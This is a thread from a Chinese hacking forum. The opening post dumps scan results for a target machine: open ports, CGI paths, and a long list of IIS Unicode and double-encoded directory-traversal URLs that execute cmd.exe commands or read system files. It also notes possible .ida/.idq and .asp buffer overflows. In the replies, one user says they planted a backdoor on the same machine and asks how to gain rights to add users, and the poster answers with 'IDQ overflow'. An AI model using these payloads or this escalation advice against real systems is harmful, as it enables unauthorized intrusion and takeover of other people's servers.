论坛: 菜鸟乐园 标题: 这台机器也太多漏洞了吧,蜜罐~! 复制本贴地址    
作者: tianyecool [tianyecool]    论坛用户   登录
开放端口
21 - FTP (Control)
25 - SMTP, Simple Mail Transfer Protocol
110 - Pop3, Post Office Protocol - Version 3
80 - HTTP, World Wide Web
443 - HttpS, Secure HTTP
135 - Location Service
CGI漏洞
/scripts/samples/search/qfullhit.htw
/scripts/samples/search/qsumrhit.htw
/null.ida
/null.idq
/_vti_inf.html
/abczxv.htw
/_vti_bin/shtml.dll/_vti_rpc
/_vti_bin/shtml.dll
/_vti_bin/shtml.exe
IIS漏洞
/a.asp/..%c0%2f../..%c0%2f../winnt/win.ini
/a.asp/..%c1%1c../..%c1%1c../winnt/win.ini
/_vti_bin/..%c0%2f../..%c0%2f../..%c0%2f../winnt/system32/cmd.exe?/c+dir
/_vti_bin/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+dir
/scripts/..%c0%2f..%c0%2f..%c0%2f..%c0%2f../winnt/system32/cmd.exe?/c+dir
/scripts/..%c0%2f../..%c0%2f../..%c0%2f../winnt/system32/cmd.exe?/c+dir
/scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir
/scripts/..%c1%1c..%c1%1c..%c1%1c..%c1%1c../winnt/system32/cmd.exe?/c+dir
/scripts/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+dir
/scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir
/scripts/check.bat/..%c0%2f..%c0%2f..%c0%2fwinnt/system32/cmd.exe?/c%20dir%20C:\
/scripts/check.bat/..%c1%1c..%c1%1c..%c1%1cwinnt/system32/cmd.exe?/c%20dir%20C:\
/_vti_bin/..%%35%63../..%%35%63../..%%35%63../winnt/system32/cmd.exe?/c+dir
/_vti_bin/..%25%35%63../..%25%35%63../..%25%35%63../winnt/system32/cmd.exe?/c+dir
/_vti_bin/..%%35c../..%%35c../..%%35c../winnt/system32/cmd.exe?/c+dir
/_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir
/scripts/..%%35c../..%%35c../..%%35c../winnt/system32/cmd.exe?/c+dir
/scripts/..%%35%63../..%%35%63../..%%35%63winnt/system32/cmd.exe?/c+dir
/scripts/..%%35%63../..%%35%63../..%%35%63../winnt/system32/cmd.exe?/c+dir
/scripts/..%%35c../..%%35c../..%%35cwinnt/system32/cmd.exe?/c+dir
/scripts/..%%35c../winnt/system32/cmd.exe?/c+dir
/scripts/..%25%35%63../..%25%35%63../..%25%35%63../winnt/system32/cmd.exe?/c+dir
/scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir
/scripts/..%255c../winnt/system32/cmd.exe?/c+dir
/scripts/check.bat/..%255c../..%255cwinnt/system32/cmd.exe?/c%20dir%20C:\
/scripts/..%255c../..%255c../..%255cwinnt/system32/cmd.exe?/c+dir
/scripts/..%25%35%63../winnt/system32/cmd.exe?/c+dir
/scripts/..%25%35%63../..%25%35%63../..%25%35%63winnt/system32/cmd.exe?/c+dir
/scripts/check.bat/..%%35%63../..%%35%63winnt/system32/cmd.exe?/c%20dir%20C:\
/scripts/..%252f..%252f..%252f..%252fwinnt/system32/cmd.exe?/c+dir
/scripts/check.bat/..%%35c../..%%35cwinnt/system32/cmd.exe?/c%20dir%20C:\
/scripts/check.bat/..%25%35%63../..%25%35%63winnt/system32/cmd.exe?/c%20dir%20C:\
/scripts/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir
/_vti_bin/..%u00255c../..%u00255c../..%u00255c../winnt/system32/cmd.exe?/c+dir
/scripts/..%u00255c../..%u00255c../..%u00255cwinnt/system32/cmd.exe?/c+dir
/scripts/..%u00255c../winnt/system32/cmd.exe?/c+dir
/scripts/check.bat/..%u00255c../..%u00255cwinnt/system32/cmd.exe?/c%20dir%20C:\
可能存在"IIS .asp映射分块编码远程缓冲区溢出"漏洞
可能存在"IIS Index Server ISAPI扩展远程溢出"漏洞(/NULL.ida)


地主 发表时间: 08/02 19:49
回复: kuangbiao [kuangbiao]   论坛用户   登录
我感觉 我扫到的就是这台机器 ~~~
晕死~!
对了帅哥啊 怎么得到足够的权限啊 我安了后门了 可是
不能添加用户~

B1层 发表时间: 08/03 00:08
回复: tianyecool [tianyecool]   论坛用户   登录
IDQ溢出

B2层 发表时间: 08/03 13:57
回复: tony82yyf [tony82yyf]   论坛用户   登录
厉害啊

B3层 发表时间: 08/03 15:56
回复: catmi [catmi]   版主   登录
小心蛀牙

B4层 发表时间: 08/03 17:29
回复: kuangbiao [kuangbiao]   论坛用户   登录
idq溢出?
有没关于这方面的文章~
我想学学~

B5层 发表时间: 08/03 18:27
回复: wavefront [wavefront]   论坛用户   登录
呵呵,是够多的.

B6层 发表时间: 08/03 21:27
回复: yimarong [yimarong]   版主   登录
好多~

B7层 发表时间: 08/03 22:38

论坛: 菜鸟乐园

20CN网络安全小组版权所有
Copyright © 2000-2010 20CN Security Group. All Rights Reserved.
论坛程序编写:NetDemon

粤ICP备05087286号